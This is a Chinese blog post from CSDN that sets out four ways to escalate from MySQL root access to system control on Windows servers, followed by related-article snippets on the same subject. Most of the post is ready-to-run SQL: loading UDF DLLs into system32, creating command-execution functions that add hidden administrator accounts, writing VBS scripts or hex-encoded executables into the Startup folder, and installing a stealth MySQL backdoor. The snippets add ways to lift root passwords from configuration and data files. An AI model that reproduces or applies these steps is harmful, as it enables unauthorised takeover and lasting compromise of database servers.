mysql提权_mysql提权总结方法四则

最新推荐文章于 2024-04-10 08:12:39 发布
最新推荐文章于 2024-04-10 08:12:39 发布
阅读量178 收藏 1
点赞数
文章标签: mysql提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36356002/article/details/113115145
版权

一 UDF提权

这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:

create

function cmdshell returns string soname 'udf.dll'

select cmdshell('net user

iis_user 123!@#abcABC /add');

select cmdshell('net localgroup administrators iis_user /add');

select

cmdshell('regedit /s d:\web\3389.reg');

drop function cmdshell;

select

cmdshell('netstat -an');

二 VBS启动项提权

create

table a (cmd text);

insert into a values ("set wshshell=createobject

(""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c

net user iis_user 123!@#abcABC

/add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net

localgroup administrators iis_user /add"",0) " );

select * from a into

outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项,

如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。

还可以这样写:

create

table a (cmd BLOB);

insert into a values (CONVERT(***的16进制代码,CHAR));

select

* from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'

drop table

a;

执行前3条语句,就可以将***写进启动里了,前提是***一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

三 Linx Mysql BackDoor提权

Linx Mysql Door

Mysql

BackDoor是一款针对PHP+Mysql服务器开发的后门,

该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,

并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,

从而巧妙的实现了无端口,无进程,无服务的穿墙***.

用法:将Mysql.php传到PHP服务器上,点击"自动安装Mysql

BackDoor",然后直接执行命令即可

四,MIX.DLL提权

create

table temp_mix(abc longblob);

insert into temp_mix

values(load_file('D:\\web\\udf.dll'));

select * from temp_mix into dumpfile

'C:\\Windows\\system32\\udf.dll';

create function MyCmd returns string soname

'udf.dll';

select MyCmd('net user');

drop table if exists

temp_mix;

前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。

而最容易出问题的就是第4句

can't

open shared library 'udf.dll'(error 2);

就说下他.

先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数

首先百度了下.说得是:drop

function MyCmd;

就可以删到已经建立的函数.测试了下

发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG

可以执行如下语句:delete

from mysql.func where name='MyCmd';

测试了下成功了.前天再次盯着屏幕上的

can't

open shared library

'udf.dll'

又看到了这条delete语句.我们知道delete就是删除.是删的表里的东西.删下表就可以删了函数了?

那反过来.建立函数是不是就是往表里插入一条新记录?而且是mysql.func.也就是mysql这个库里的func表.

呵呵.看名字也象.测试一番后.得出如下结果:

在提权的时候.建立函数显示

can't

open shared library 'udf.dll'

就干脆跳过这句

执行另外一句.或者说.把第4句换成:insert

into mysql.func values('MyCmd',0,'udf.dll','function');

说下func这个表的结构:4

列.name,return,dl,fun.第二列和第四列的名字记不大清楚了

但意思一样.有兴趣可以自己select

* from func;

下就知道了

第一列就是新建函数的名字.字符串.第二列是返回值.填0.第三列dl指函数所在的dll名字.字符串类型

这里为我们导到系统目录里的dll名.不一定是udf.dll.只要跟你导出的一样就行.第四列作用不清楚

但是填上funciton这个字符串就能用.应该是指这个是个函数吧...因为这只是个插入操作

所以只要是root.应该不会有错误的.后面的就一样了.

select

MyCmd('whoami');

但是别急!

这里有个前提:需要重启MYSQL..我对MYSQL不了解.但是重启后新建的函数绝对可用.貌似有别的办法可以达到同样的效果

好象是flush.但是具体flush哪里.就不知道了.不过不是权限.也不是func表.试过了.而且MYSQL下

搜了很久也没找到root在MYSQL下通过命令重启的.总有种感觉.不用重启的.哪位对MYSQL熟悉的看到后如果知道有什么命令告诉小弟下...

根据我自己最近的***测试,发现无论是剑心写的还是其他mysql提权脚本,对HKEY_CURRENT_USER这个句柄都不支持,

如果服务器禁用了CMD,即使有ROOT,也无法用写注册表的方式来解禁,要是有大牛能写出来的话还望共享一下!

Intopia
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL -> 函数创建(create function),调用(select),查看函数结构(show create function),删除(drop function)
rod0320的博客
11-10 4957
函数创建:create function 无参数的 # 函数的特点,必须有返回值,且返回值只能有一个,返回的时候注意不要返回多行,会赋值不了 # 格式:create function 函数名(参数列表) returns 返回类型 "定义一个函数,返回表的总行数": delimiter $ create function mmp() returns varchar(22)# 只写返回类型就行 begin declare 局部变量 int default 0;# 定义一个局部变量 默认是0 select c
Mysql赋权
weixin_30741653的博客
05-20 794
MySQL 赋予用户权限命令的简单格式可概括为:grant 权限 on 数据库对象 to 用户 (授权后记得刷新权限:flush privileges;) 一、grant 普通数据用户,查询、插入、更新、删除 数据库中所有表数据的权利。grant select on testdb.* to common_user@'%'grant insert on testdb.* to common_user...
权限提升-MYSQL数据库提权
m0_65336233的博客
12-05 1785
提权漏洞-数据库提权
提权-MySQL数据库提权
acepanhuan的博客
02-28 1796
提权-MySQL数据库提权
mysql 5.5 udf提权_提权基础-----mysql-udf提权
weixin_39844267的博客
01-19 175
1.总结关于udf提权方法通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连(1).将udf.dll代码的16进制数声明给my_udf_a变量set @my_udf_a=concat('',dll的16进制);(2).建表my_udf_data,字段为data,类型为longblob。create table my_udf_data(data LONGBLOB);(...
MySQL提权
m0_58606546的博客
11-28 5855
MySQL提权的必要条件: 具有MySQL的root权限,且MySQL以system权限运行。 具有执行SQL语句的权限。 获取root密码的方法: 查看数据库配置文件关键字:config、conn、sql、data、inc、database等 下载mysql安装路径下的数据文件 安装路径下的data目录中存放的是数据库的数据信息 root账号密码存储在mysql数据库下的user表中 完整路径=安装路径+\data\mysql\user.MYD 3.暴力破解 MySQL数据库提...
【网络安全】mysql数据库提权
边缘拼命划水的小陈
05-08 911
UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充。# sys_eval为引入的函数,lib_mysqludf.dll是导入的dll文件名称然后就可以使用system权限执行命令了。
MYSQL数据库提权的几种方法——提权教程
热门推荐
W小哥
01-13 1万+
一、简介 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 常见密码获取方式: 1、读取网站数据库配置文件(了解其命名规则及查找技巧) 例如:sql data inc config conn database common include等 2、读取数据库存储或备份文件(了解其数据库存储格式及对应内容) 例如:@@basedir/data/数据库名/表名.m
Mysql数据库提权
weixin_44023460的博客
07-12 1293
Root用户的密码还可能从网页脚本文件中获得,数据库连接直接使用root用户。分别在查询中输入脚本“select shell(‘cmd’,‘net user temp temp123456’)”、“select shell(‘cmd’,'net localgroup administrators temp /add ')”并执行该查询命令,如果执行成功,则表示在系统中添加“temp”用户,密码为“temp123456”,同时将该用户添加到管理员组中,使其具备管理员权限,执行成功后如图5,图6所示。
MYSQL提权
weixin_46626159的博客
03-19 5212
MYSQL udf 提权 一.获取网站权限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF提权 1.UDF提权知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
MySQL数据库提权
qq_45813384的博客
02-20 277
利用MySql文件导出机制,由于未对文件导出路径进行限制,从而可以利用**secure_file_priv**参数、**日志**、**慢日志**等导出含带恶意代码的PHP文件,获取webshell。
数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 1961
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
Windows提权mysql数据库提权(UDF提权)
mrx56的博客
03-31 3103
可通过sqlmap或者msf获取udf文件。
权限提升:Mysql 数据库 .(UDF || 启动项 || 反弹)
网络安全领域___专研者.
04-29 1505
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权
mysql数据库提权
最新发布
m0_63197559的博客
04-10 765
MySQL数据库提权学习总结
MySql数据库提权学习总结
Haakure的博客
10-21 586
sqlmap\data\udf\mysql\windows\64目录下生成一个dll的文件lib_mysqludf_sys.dll,这个我们就可以直接拿来利用。在windows系统中,配置文件my.ini在 MySql 安装的根目录下,也有可能在隐藏文件夹“ProgramData”下。在Linux系统中,MySQL的配置文件位于/etc/mysql/my.cnf。secure_file_priv是用来限制mysql数据库导出的位置/目录。安装路径下的data目录存放的是数据库的数据信息。
Mysql udf /Mix 提权
Coisini的博客
06-12 338
第一部分从Hack58看到了,原作者不知道了,下面的部分也是从网上摘的,如侵犯了版权请留言。 一、功能:利用MYSQL的自定义函数功能(再次声 明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。二、适用场合:1.目标系统是 Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须...
mysql简单提权
05-23 932
S- serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的 pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不
记一次phpmailer漏洞+UDF提权.pdf
03-14
最终,渗透者对整个渗透过程进行总结,以便反思和改进自己的渗透技巧和方法。 总之,本次渗透过程涉及到漏洞扫描、SSH账户密码爆破、使用PHPMailer漏洞进行UDF提权等多个环节。通过充分利用各种渗透工具和技术,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值